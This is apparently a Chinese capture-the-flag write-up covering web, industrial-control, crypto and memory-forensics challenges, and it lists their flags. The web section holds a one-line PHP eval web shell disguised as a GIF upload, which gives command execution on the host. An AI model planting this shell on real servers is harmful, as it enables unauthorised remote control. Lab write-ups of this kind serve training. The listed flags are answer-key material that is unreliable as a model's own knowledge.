web

Forbidden上傳-B

http://172.100.3.159/upload.php 上傳木馬 GIF89a<?php @eval($_POST['cmd']); ?>
蟻劍連接得到 根目錄的flag.txt

ICS

奇怪的工程圖-B

可能是這個(gè)數(shù)。也可能差1下。搞個(gè)計(jì)時(shí)器周期電路自動(dòng)跑。或者按梯形圖自己寫(xiě)個(gè)腳本。

信捷工程分析-B

binwalk 解壓出來(lái)個(gè) test.exe

  strcat(Destination, "CVE-2021-34605");
  if ( (unsigned int)calculate_sha256(Destination, v9) )
  {
    v10 = hash_to_hex(v9, 32LL);
    puts("input your flag");
    *(_QWORD *)Str1 = 0LL;
    v8[0] = 0LL;
    *(_QWORD *)((char *)v8 + 7) = 0LL;
    scanf("%s", Str1);
    if ( !strncmp(Str1, "flag{", 5uLL) )
    {
      if ( !strncmp(&Str1[5], (const char *)(v10 + 14), 0x10uLL) )
        puts("you win");
      else
        puts("wrong flag");
      return 0;
    }

flag是CVE-2021-34605的sha256前16位。

flag{d3c523f97c3f0419}

異常Modbus流量溯源-B

只有一個(gè) code 15, 地址是4xxx的

2024-07-15T02:00:00Z | Modbus/TCP | TransactionID: 0x11C2 | Function Code: 15 | Address: 45445
flag格式：flag{FC15_45445}

電力SCADA流量審計(jì)-B

tshark -r a.pcapng -Y “iec60870_asdu” -e “iec60870_asdu.addr” -T fields

去掉些沒(méi)用的得到flag

flag{QKSW4LSFA9Y897RALE4OBNJDBV74VJ0U}

Crypto

密碼

模式 - 小e攻擊 .

然后柵欄密碼.

flag{1be929d4fd0tt}

Misc

內(nèi)存鏡像溯源取證-B

vol 讀取桌面有個(gè)xlsx, 用r-studio沒(méi)有提取出來(lái).

lovelymem說(shuō)是能讀取出來(lái).

vol3 讀取出來(lái)了.(但需要聯(lián)網(wǎng)下個(gè)東西), vol2也可以。當(dāng)時(shí)提取失敗，回去測(cè)時(shí)文件就提取成功了。

vol.exe -f FishMemory.raw -o out windows.dumpfiles --virtaddr 0x1e4311c0

掃描命令行得到一個(gè)密碼

JohnDos@123d

xls用這個(gè)密碼打開(kāi)。在a2單元格有flag UTF7編碼。隨波逐流一把梭。